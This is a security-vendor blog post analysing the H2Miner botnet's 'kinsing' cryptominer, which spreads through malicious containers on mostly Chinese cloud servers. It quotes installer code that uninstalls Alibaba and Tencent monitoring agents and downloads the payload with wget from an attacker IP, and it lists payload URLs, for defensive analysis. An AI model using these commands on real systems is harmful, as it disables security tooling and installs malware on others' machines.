H2Miner botnet spreads container malware in cloud
Containers are gaining popularity as malware deployment mechanisms in the cloud. Beginning on Valentine’s Day, one malicious container started making its rounds and has steadily expanded to over 350 infections. The malware and infrastructure have been attributed to the “H2Miner” cryptomining botnet which was last reported in January propagating via a Redis R CE : New Outbreak of h2Miner Worms Exploiting Redis RCE Detected.
Currently this activity is primarily targeting cloud servers in China. The following chart shows a breakdown of servers by organization. The vast majority belong to Chinese cloud providers such as Aliyun (Alibaba) and Tencent Cloud.
The malicious container was originally identified by searching on known malware artifacts in Shodan ( https://www.shodan.io/search?query=%22217.12.221.244%22 ). As shown in Figure 3, there is an observable command that downloads a bash installer, which in turn preps the system and then tries to download the final cryptomining payload.
Figure 3. Container malware observed in Shodan
The installer will first attempt to remove competing cryptominers. It does this by grepping other mining processes and network connections and then terminates them if found. It will also attempt to avoid detection by uninstalling monitoring agents for Tencent and Alibaba Cloud. The targeted removal of these security agents is likely a reason for the infection concentration among Tencent and Alibaba cloud servers.
if ps aux | grep -i ‘[a]liyun’; then
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
curl http://update.aegis.aliyun.com/download/quartz_uninstall.sh | bash
pkill aliyun-service
rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
rm -rf /usr/local/aegis*
systemctl stop aliyun.service
systemctl disable aliyun.service
service bcm-agent stop
yum remove bcm-agent -y
apt-get remove bcm-agent -y
The payload mining malware is known as “kinsing” and was previously reported on by Alibaba’s cloud security team. The installer downloads kinsing from one of two URLs and then verifies the hash ( a71ad3167f9402d8c5388910862b16ae. The following shows the portion of the installer that’s responsible for this:
download3() { $WGET $DIR/kinsing http://217.12.221.244/kinsing chmod +x $DIR/kinsing if [ -x "$(command -v md5sum)" ]; then sum=$(md5sum $DIR/kinsing | awk '{ print $1 }') echo $sum case $sum in a71ad3167f9402d8c5388910862b16ae) echo "kinsing OK" ;; *) echo "kinsing wrong" ;; esac else echo "No md5sum" fi }In addition to cryptomining functionality, kinsing also has remote administration features with the ability to run additional malware. Kinsing is a 64 bit ELF executable and was coded in Golang. There are a total of 15 variants on Virus Total with a wide range of detection ratios between 3/61 and 27/61. ( Note: these were found by searching on the artifact “ main.minerRunning “ which is unique to kinsing.)
All variants are hardcoded with the same C2 IPs:
One odd artifact in the kinsing binary is the presence of Shakespeare’s Hamlet — all five Acts of the entire play. The reason for this is unclear however it may be an attempt to confuse analysts by adding noise or a crude technique for avoiding hash-based detections.
Figure 4. Hamlet Artifacts: “Though this be madness, yet there is method in’t.”
The following are all known kinsing download URLs. The first two were observed in the most recent installer. All of the download URLs hosted on bitbucket are no longer online.
https://bitbucket.org/kimganad81/git/raw/master/kinsing
https://bitbucket.org/insane235n/git/raw/master/kinsing
https://bitbucket.org/orgaj125/git/raw/master/kinsing
Additional insight into the botnet was obtained by running the IPs through Greynoise. is a useful search API and provides additional context on IPs that is unavailable elsewhere. As shown in Figure 4, several of the IPs running the containers were tagged as “Dockerd scanners” and “Kubernetes crawlers.”
Lacework believes the hosts installed with kinsing were subsequently recruited as scanners by the botnet for self-propagation purposes. While the specific propagation technique was not observed, it’s possibly leveraging the same Redis RCE from January. This is supported by the “Redis Scanner” tag which was the third most common among the hosts.
Cyptominers will likely expand their exploitation of cloud resources, especially during this unstable global economy. This has the potential to exacerbate the strain on cloud resources as more people are now working from home. Fortunately, the installation of these programs can easily be detected and mitigated with cloud security agents such as those provided by Lacework and other vendors.
If you found this blog useful then please share on your social media!
The following is a sampling of indicators. For a complete list, check out our GitHub repository: https://github.com/lacework/lacework-labs/blob/master/blog/h2miner.csv
Photo from Harrison Kugler via Unsplash
Originally published at https://www.lacework.com on March 25, 2020.
